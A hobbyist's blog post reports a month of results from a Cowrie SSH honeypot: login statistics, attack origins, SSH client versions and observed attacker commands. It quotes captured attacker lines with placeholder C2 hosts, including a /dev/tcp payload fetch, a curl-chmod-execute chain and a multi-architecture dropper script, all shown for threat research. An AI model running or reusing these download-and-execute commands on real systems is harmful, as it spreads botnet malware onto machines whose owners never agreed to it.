Adventures in Running a Honeypot

Posted 2024/08/18

I’ve been doing some malware research as a hobby for a while now because I find it interesting and useful for sharpening my reverse engineering skills. Malware researchers analyze malware samples to determine their unique features, objectives, and potential effects. I usually work on random infostealers that pop up on Discord or old malicious Microsoft Office documents (not all of which I have written about)¹. Looking to get deeper into malware research, I decided to start a honeypot server to do a bit more threat hunting and collect newer malware samples to analyze.

What is a Honeypot

A honeypot is a piece of data or device that appears to legitimately have information or resources of value to a potential online attacker. The honeypot is actually isolated and monitored, and will log and analyze the activities of any attacker. Honeypot servers host services that appear to be vulnerable to bait in attacks, which can be analyzed to better understand its source and behaviour.

How did I setup my Honeypot

My honeypot server is an Ubuntu server VM running in an isolated cloud account. The server has its own public IPv4 address and runs the Cowrie SSH/Telnet honeypot software on the usual SSH TCP/22 port. Cowrie is intentionally setup to accept a variety of common username and passwords and upon a successful login will emulate a Debian 5.0 shell with a fake file system. Attackers can send commands to the shell, upload files with SFTP or SCP, or attempt SSH proxying. Any actions made or credentials used will be logged. Cowrie will also save any malicious files uploaded to it or downloaded through attempted Wget or Curl commands for further analysis. My Cowrie installation is also setup to send its logs to Datadog to make activity on the honeypot searchable, and to take advantage of Datadog’s threat intelligence capabilities.

To make Cowrie more convincing as an SSH server, the actual SSH server that I use to manage the server is run on a different port and hidden behind port knocking. Port knocking blocks access to the SSH server’s port using the firewall, unless a specific sequence of connection attempts are made first. This stops the SSH server from showing up in port scans of the server, making Cowrie’s role as the server’s legitimate SSH server more convincing.

Random things that I learned from setting this all up:

Some Ubuntu 24.04 images available on cloud providers won’t respect the port you select in /etc/ssh/sshd_config anymore 😭, instead you have to edit the Systemd ssh.socket configuration
Remember to actually enable the knockd and SSH services to run on boot before you reboot the server 🤣 (I think SSH somehow got disabled during all my attempts at changing the port)
Some cloud providers provide serial access to your machines to let you login using a TTY session in case you mess up your SSH!
You can’t use serial access unless you set a password for your user account which I usually don’t do because I use SSH keys 😭
Some cloud providers don’t like you using UFW for your firewall and instead want you to use IPTables manually?

With this setup and knowledge that attackers are constantly port scanning or spraying the entire IPv4 address space with attacks², all I had to do was wait for attackers to run brute force password attacks and analyze the following activity. I also plan on adding the TANNER/SNARE web application honeypot created by the MushMush Foundation in the near future to collect information on web application attacks as well.

What have I found so far

I’ve been running the honeypot server for about a month and have collected ~150 malware samples so far! Attackers really are hard at work with cloud server instances or botnets dedicated to port scanning the internet and password spraying attacks.

Below is a histogram of activity on the Cowrie service, note the spikes in activity that occur whenever big password bruteforce attacks are conducted.

histogram of activity

Usernames & Passwords

Unsurprisingly, some of the most used passwords in bruteforce attacks were variations of 123456, root, admin and password. Some passwords that surprised me in how frequently they were attempted were keywords related to cryptocurrencies³, some common first names, or weird keyboard layout tricks like 1q2w3e4r (first two rows of QWERTY) or !QAZ@WSX (first two columns).

bar graph of most common usernames and passwords

I tried to categorize the passwords used and got the following rough count:

'password' variations:                                  78 (941 attempts)
'root' variations:                                      83 (593 attempts)
numerical:                                              248 (6198 attempts)
domains:                                                19 (422 attempts)
linux distro names:                                     15 (299 attempts)
common first names:                                     209 (702 attempts)
linux software names:                                   63 (624 attempts)
cryptocurrency related:                                 23 (271 attempts)

identical username and password:                        1313 (7459 attempts)
password starts with username (excluding identical):    942 (2965 attempts)
username in password (excluding identical):             957 (2995 attempts)

total login attempts:                                   23201
total user/pw combinations:                             5952
total usernames tested:                                 1460
total passwords tested:                                 3705

I also found that not all passwords tested come from password dictionaries, but bots will occasionally tailor passwords to the target through methods like incorporating the target IP or service name into the password.

Geographic Origin

Analyzing the countries that attacks came from was pretty interesting. The United States, China, South Korea, and India showing up at the top makes sense considering their respective Internet of Things markets are the largest in the world, and IoT devices are some of the largest contributors to botnets like Mirai. Many botnets use these devices to conduct DDoS attacks and password bruteforce attacks. After these IoT market heavyweights, I expected the graph of top countries to roughly follow the size of each country’s IPv4 address allocation, but that does not seem to be the case.

bar graph of most common countries of origin

Analyzing IPs by ASNs shows that not all attacks come from IoT devices. Many attacks do originate from consumer telecommunication networks which is representative of IoT attacks like ASN4134 CHINANET-BACKBONE, ASN14061 Korea Telecom, and ASN7922 Comcast. However, many attacks seem to come from cloud providers like ASN396982 Google Cloud Platform, ASN14061 Digital Ocean, ASN8075 Microsoft, and ASN37963 Alibaba which suggests that insecurely configured servers are being added to botnets or attackers are setting up port scanners, bruteforcers, and command & control infrastructure on these providers.

bar graph of most common ASNs of origin

SSH Client Versions

Clients that connect to SSH servers usually pass along information about their client version and supported encryption and hashing algorithms. Looking at SSH client versions, we can see that common client libraries used to create bruteforcers include the builtin Golang SSH module, Paramiko for Python, Makiko for Rust, and LibSSH. Many attackers also use regular clients like PUTTY or OpenSSH. It is interesting to see that OpenSSH will also provide information about the client’s Debian, Ubuntu, or Raspbian versions. Port scanners like Nmap, ZGrab2.0, and MGLNDD can also be seen.

bar graph of most common ssh versions

Commands & Payloads

Finally moving onto what we setup the whole honeypot for, the attacks themselves!

A lot of the bruteforcers that attack the honeypot upon having a successful login seem to just collect information about the system, and presumably let the attacker come back and investigate the server later. Common commands run for information gathering include the following:

uname -s -v -n -r -m  # collects information about the kernel, OS, hostname, CPU architecture
uname -s -m  # less detailed variant of above used to get architecture
whoami  # finds what user the attacker logged in as, useful to see what permissions are available
lscpu | grep "CPU(s):                "  # getting CPU information
ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*  # listing attacked devices and sockets
cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c  # getting CPU information
cat /etc/os_release  # getting OS information
uptime  # getting system uptime
grep -c ^processor /proc/cpuinfo  # CPU information (core count)

Most other attacker commands involved downloading executables with Wget or Curl, running those executables, moving or deleting files, changing passwords, changing file permissions, or gaining persistence with Cron.

It was interesting to see that when downloading malicious files, attackers would try using Wget, Curl, and BusyBox Wget just in case the victim didn’t have them all installed. Some attackers would try installing Curl themselves before this step using the APT package manager. Some attackers also went the extra step of opening TCP sockets themselves to make HTTP requests if none of those utilities were available:

exec 6<>/dev/tcp/<C2_SERVER_IP>/60100 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/2ODoY9YgNB

It was also interesting to see there were some rivalries among malware authors. Attackers would frequently try to kill other processes they suspected were other malware or harden firewall rules to block rival command & control servers (C2):

iptables -A INPUT -s <RIVAL_C2_IPV4_ADDR> -j DROP  # blocking rival C2 server in the firewall
pkill bin.x86_64  # killing rival malicious processes
ps | grep '[Mm]iner'  # searching for competing cryptominers
ps -ef | grep '[Mm]iner'

The attempt to block rival C2 servers actually led me to find C2 servers that haven’t attacked my honeypot yet with HTTP or FTP servers filled with additional samples I could download from.

Below is a graph of the most commonly run commands that attackers use:

bar graph of most common commands run

The majority of malicious programs were delivered to my honeypot through the execution of Wget or Curl commands to download from an HTTP server. These commands would be chained with commands to enable execution permissions and then the execution of the malicious program like curl -s -O http://<C2_SERVER_IP>/bot && chmod 777 bot && ./bot. Sometimes these commands would download the malicious ELF or PE executable directly or download a dropper script. These dropper scripts would contain URLs for executables compiled for many different CPU architectures, and the script would try downloading and run them all:

#!/bin/bash
PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin
/bin/rm bins.sh
wget http://<C2_SERVER_IP>/bins/Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f; curl -O  http://<C2_SERVER_IP>/bins/Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f;/bin/busybox wget http://<C2_SERVER_IP>/bins/Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f; chmod 777 Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f; ./Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f;rm Ds1vtBVALi2MnkfihXA9wXoTmtJgDCus5f ##powerpc-440fp
wget http://<C2_SERVER_IP>/bins/IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi; curl -O  http://<C2_SERVER_IP>/bins/IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi;/bin/busybox wget http://<C2_SERVER_IP>/bins/IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi; chmod 777 IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi; ./IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi;rm IEGUEfxRokfJMYs5bfc3caULTNmlDgiGUi ##x86_64
# [...TRUNCATED FOR READABILITY...]
wget http://<C2_SERVER_IP>/bins/2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX; curl -O  http://<C2_SERVER_IP>/bins/2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX;/bin/busybox wget http://<C2_SERVER_IP>/bins/2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX; chmod 777 2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX; ./2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX;rm 2hVLN1LjbJMBGOzkPgGlXLPYZ8G5lUrmUX ##armv6l

Some malicious programs were also uploaded to the honeypot using SFTP or SCP and use followup commands to run the executable.

The malicious files I have collected so far have been in many different file formats and compiled for many different CPU architectures:

 ELF executable, MIPS, MIPS-I, SYSV                     24 files
 ELF executable, ARM, EABI4, SYSV                       21 files
 ELF executable, ARM, ARM                               20 files
 ELF executable, x86-64, SYSV                           18 files
 ELF executable, Intel 80386, SYSV                      17 files
 ELF executable, PowerPC or cisco 4500, SYSV            10 files
 ELF executable, Renesas SH, SYSV                       7 files
 Bourne-Again shell script, ASCII text executable       5 files
 ELF executable, Motorola m68k, 68020, SYSV             4 files
 ELF executable, SPARC, SYSV                            3 files
 XML 1.0 document, ASCII text                           2 files
 PE32+ executable x86-64, for MS Windows                2 files
 HTML document, ASCII text                              2 files
 ELF executable, MIPS, MIPS64, SYSV                     2 files
 ELF executable, Synopsys ARCompact ARC700 cores, SYSV  1 file
 ELF executable, ARM, EABI5 GNU/Linux                   1 file
 ELF 64-bit LSB shared object, x86-64, SYSV             1 file
 ELF 64-bit LSB shared object, ARM aarch64, SYSV        1 file
 ELF 32-bit LSB shared object, Intel 80386, GNU/Linux   1 file
 ELF 32-bit LSB shared object, ARM, EABI5 GNU/Linux     1 file

There are so many samples to sift through, but with this new material to analyze, expect to see a resumption of blog posts on Malware reverse engineering in the future!

All Indicators of Compromise (malicious file hashes, URLs, domain names, and IP addresses) that I’m collecting from this honeypot project can be found in this VirusTotal collection.

I did intercept a Log4J exploit payload that was thrown at my website once containing the January 2024 version of the RedTail cryptominer malware once ↩
It only actually takes like 5 minutes to scan the entire IPv4 address space using tools like masscan ↩
Cryptocurrency is an abject disaster - Drew DeVault’s blog ↩